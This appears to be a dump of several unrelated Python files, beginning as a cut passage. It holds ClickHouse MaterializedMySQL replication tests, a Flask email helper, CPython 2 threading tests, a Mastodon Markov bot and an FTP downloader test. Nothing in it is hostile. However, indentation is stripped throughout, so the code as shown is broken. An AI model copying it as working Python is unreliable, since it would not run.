mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
|
email.py | # -*- coding: utf-8 -*-
from flask_mail import Message
from flask import render_template
from threading import Thread
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(receiver, subject, template, **kwargs):
msg = Message(app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject,\
sender=app.config['MAIL_USERNAME'], recipients=[receiver])
msg.body = render_template(template + '.txt', **kwargs)
thread = Thread(target=send_async_email, args=[app, msg])
thread.start()
return thread
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.test_support.cpython_only
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
@test.test_support.cpython_only
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
@test.test_support.cpython_only
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
app.py | #!/usr/bin/env python3
import configparser
import time
import threading
import mastodonTool
import os
import datetime
import markovify
import exportModel
import re
# 環境変数の読み込み
config_ini = configparser.ConfigParser()
config_ini.read('config.ini', encoding='utf-8')
def worker():
# 学習
domain = config_ini['read']['domain']
read_access_token = config_ini['read']['access_token']
write_access_token = config_ini['write']['access_token']
account_info = mastodonTool.get_account_info(domain, read_access_token)
params = {"exclude_replies": 1, "exclude_reblogs": 1}
filename = "{}@{}".format(account_info["username"], domain)
filepath = os.path.join("./chainfiles", os.path.basename(filename.lower()) + ".json")
if (os.path.isfile(filepath) and datetime.datetime.now().timestamp() - os.path.getmtime(filepath) < 60 * 60 * 24):
print("モデルは再生成されません")
else:
exportModel.generateAndExport(mastodonTool.loadMastodonAPI(domain, read_access_token, account_info['id'], params), filepath)
print("LOG,GENMODEL," + str(datetime.datetime.now()) + "," + account_info["username"].lower()) # Log
# 生成
with open("./chainfiles/{}@{}.json".format(account_info["username"].lower(), domain)) as f:
textModel = markovify.Text.from_json(f.read())
sentence = textModel.make_sentence(tries=300)
sentence = "".join(sentence.split()) + ' #bot'
sentence = re.sub(r'(:.*?:)', r' \1 ', sentence)
print(sentence)
try:
mastodonTool.post_toot(domain, write_access_token, {"status": sentence})
except Exception as e:
print("投稿エラー: {}".format(e))
def schedule(f, interval=1200, wait=True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target=f)
t.start()
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
if __name__ == "__main__":
# 定期実行部分
schedule(worker)
# worker()
|
test_ftp_file_download_manager.py | """ simple ftp tests """
# --------------------------------------------------
# Imports
# --------------------------------------------------
import filecmp
import os
import Queue
import shutil
import time
from threading import Thread
import ftplib
import unittest
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import MultiprocessFTPServer
from superftp.ftp_file_download_manager import FtpFileDownloader
# --------------------------------------------------
# Test Classes
# --------------------------------------------------
class TestFTPFileDownloadManager(unittest.TestCase):
""" unit tests for ftp_file_download_manager """
def __init__(self, *args, **kwargs):
super(TestFTPFileDownloadManager, self).__init__(*args, **kwargs)
self._ftp_thread = None
self._blocks_downloaded = 0
def _start_ftp_server(self, ftp_root_dir, port=2121):
""" start the test ftp server
Args:
ftp_root_dir - root directory for the ftp server
port - port number for the ftp server
Returns:
thread running the ftp server
"""
def tw_ftp_server():
""" thread worker for the ftp server """
authorizer = DummyAuthorizer()
authorizer.add_user('user', '12345', ftp_root_dir, perm='elradfmwMT')
# Instantiate FTP handler class
handler = FTPHandler
handler.authorizer = authorizer
server = MultiprocessFTPServer(('', port), handler)
server.max_cons = 256
server.max_cons_per_ip = 10
# start ftp server
while self._com_queue.empty():
server.serve_forever(timeout=0.1, blocking=False)
self._com_queue.get()
server.close_all()
time.sleep(1)
# launch a thread with the ftp server
t = Thread(target=tw_ftp_server, args=())
t.start()
return t
def _stop_ftp_server(self):
""" stop the test ftp server """
self._com_queue.put('STOP')
def setUp(self):
""" start the test ftp server """
# tearDown in case we had a previous failed test
self.tearDown()
# generate the test data
self._com_queue = Queue.Queue()
self._results_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'results_ftp_file_download_manager')
if not os.path.exists(self._results_dir):
os.mkdir(self._results_dir)
self._test_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_data')
shutil.rmtree(self._test_dir)
os.mkdir(self._test_dir)
filepath = os.path.join(self._test_dir, 'testfile.txt')
with open(filepath, 'w') as f:
for i in range(0, 20):
f.write(str(i) + '.' * (1024 * 1024) + '\n')
os.mkdir(os.path.join(self._test_dir, 'a'))
filepath = os.path.join(os.path.join(self._test_dir, 'a'), 'testfile2.txt')
with open(filepath, 'w') as f:
for i in range(0, 2):
f.write(str(i) + '.' * (1024 * 1024) + '\n')
self._ftp_thread = self._start_ftp_server(self._test_dir, 2121)
# give the ftp server some time to start up
time.sleep(1)
def tearDown(self):
""" stop the ftp server """
if self._ftp_thread:
self._stop_ftp_server()
while self._ftp_thread.is_alive():
time.sleep(0.01)
self._ftp_thread = None
@unittest.skip("not implemented")
def test_chunk_download(self):
""" test the download of a single chunk in a file comprised of many blocks """
pass
def test_file_download(self):
""" test the download of a small simple file using download_file """
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=True)
ftp.download_file('testfile.txt', self._results_dir)
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
def test_directory_download(self):
""" test the download of a directory using download_file """
# clean up the results directory
dir_path = os.path.join(self._results_dir, 'dir_test')
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
# download the directory
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=True)
ftp.download('/', dir_path)
# verify the sub directory was actually created
self.assertTrue(os.path.exists(os.path.join(dir_path, 'a')))
self.assertFalse(os.path.isfile(os.path.join(dir_path, 'a')))
# verify the files were downloaded correctly
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(dir_path, 'testfile.txt'), shallow=False))
